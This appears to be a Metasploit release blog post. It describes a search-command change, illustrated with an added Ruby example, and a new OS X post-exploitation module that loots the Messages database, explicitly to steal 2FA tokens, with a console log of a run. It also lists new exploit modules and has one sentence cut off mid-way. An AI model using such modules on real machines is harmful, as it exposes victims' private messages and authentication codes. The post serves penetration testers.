For a very long time, the `search` command has used a union of the results of all search terms. This means that if you do something like `search linux firefox`, you'll get a list of all modules that mention linux, regardless of the application they target, and all modules that mention firefox, regardless of their platform. Most people are probably expecting the intersection, i.e. you probably wanted to see only the modules that target Firefox on Linux. So now that's what happens.
The exception is when you have two or more of a single keyword operator, like `search arch:x86 arch:mips`. That will still get you the union of those two, since arguably it makes more sense to see results for both in this case.
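The matching rule described above, modelled as an added Ruby example (not Metasploit's own search code): every bare term must match, while repeated values of one keyword operator are alternatives. The module names and fields are constructed sample data, and `parse_query`, `field_match?` and `search` are hypothetical helpers.

```ruby
# Constructed sample index; names and fields are illustrative, not real framework data.
MODULES = [
  { name: 'exploit/linux/browser/firefox_demo',   platform: 'linux',   arch: 'x86'  },
  { name: 'exploit/windows/browser/firefox_demo', platform: 'windows', arch: 'x86'  },
  { name: 'exploit/linux/http/router_demo',       platform: 'linux',   arch: 'mips' },
  { name: 'post/osx/gather/messages_demo',        platform: 'osx',     arch: 'x64'  }
].freeze

# Split a query into groups. Each bare term gets its own group, while
# repeated keyword operators (arch:x86 arch:mips) share a single group.
def parse_query(query)
  groups = Hash.new { |h, k| h[k] = [] }
  query.split.each_with_index do |token, i|
    key, value = token.split(':', 2)
    if value.nil? || value.empty?
      groups[[:text, i]] << token.downcase       # bare term: unique group key
    else
      groups[key.downcase.to_sym] << value.downcase
    end
  end
  groups
end

# Bare terms are matched against every field; keyword operators against
# the field they name (an unknown keyword matches nothing).
def field_match?(mod, key, value)
  if key.is_a?(Array)
    mod.values.any? { |v| v.downcase.include?(value) }
  else
    mod[key].to_s.downcase.include?(value)
  end
end

# combine: :all? models the new behaviour (intersection across groups);
# combine: :any? models the old behaviour (union of every term).
# Values inside one group are always alternatives.
def search(query, combine: :all?, modules: MODULES)
  groups = parse_query(query)
  hits = modules.select do |mod|
    groups.public_send(combine) do |key, values|
      values.any? { |v| field_match?(mod, key, v) }
    end
  end
  hits.map { |m| m[:name] }
end
```

With this sample data, `search('linux firefox')` returns only the Linux Firefox entry, while `search('linux firefox', combine: :any?)` reproduces the old three-result union.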
This release brings a new post module from Geckom: `post/osx/gather/enum_messages`, a module for gathering messages from the Messages app in OS X. With the ability to connect your phone to the Messages app, this module provides an easy way to steal 2FA tokens and other goodies from a connected phone, assuming you have an active session on the target machine.
The module supports a few operations:
- `DBFILE` for grabbing the SQLite DB directly,
- `READABLE` for collecting messages in a human readable format,
- `LATEST` for collecting only the latest message, and
- `ALL` for doing all of the above.
Here's an example of what to expect:
```
msf > use post/osx/gather/enum_messages
msf post(enum_messages) > set session -1
session => -1
msf post(enum_messages) > run
[+] [redacted]:56791 - Messages DB found: /Users/[redacted]/Library/Messages/chat.db
[+] [redacted]:56791 - Found Messages file: /Users/[redacted]/Library/Messages/chat.db
[*] [redacted]:56791 - Looting /Users/[redacted]/Library/Messages/chat.db database
[*] [redacted]:56791 - Generating readable format
[*] [redacted]:56791 - Retrieving latest messages
[+] [redacted]:56791 - Latest messages:
[+] [redacted]:56791 - messages.db stored as: /Users/[redacted]/.msf4/loot/20161207151127_default_[redacted]_messages.db_947304.db
[+] [redacted]:56791 - messages.txt stored as: /Users/[redacted]/.msf4/loot/20161207151127_default_[redacted]_messages.txt_801211.txt
[+] [redacted]:56791 - latest.txt stored as: /Users/[redacted]/.msf4/loot/20161207151127_default_[redacted]_latest.txt_986021.txt
[*] Post module execution completed
msf post(enum_messages) >
```
That's all there is to it! You can change the user to retrieve messages from by setting the `USER` option, or you can let the module work against the current user. If you want to retrieve more than three messages, you can change that with
Exploit modules (2 new)
- PDF Shaper Buffer Overflow by metacom, and metacom27
- Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key) by Matt Graeber, Matt Nelson, and OJ Reeves
Auxiliary and post modules (2 new)
- WordPress Symposium Plugin SQL Injection by Matteo Cantoni, and PizzaHatHacker exploits CVE-2015-6522
- OS X Gather Messages by Geckom
As always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub: